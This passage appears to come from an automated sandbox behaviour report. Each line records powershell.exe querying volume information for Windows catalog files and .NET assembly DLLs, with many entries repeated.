        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
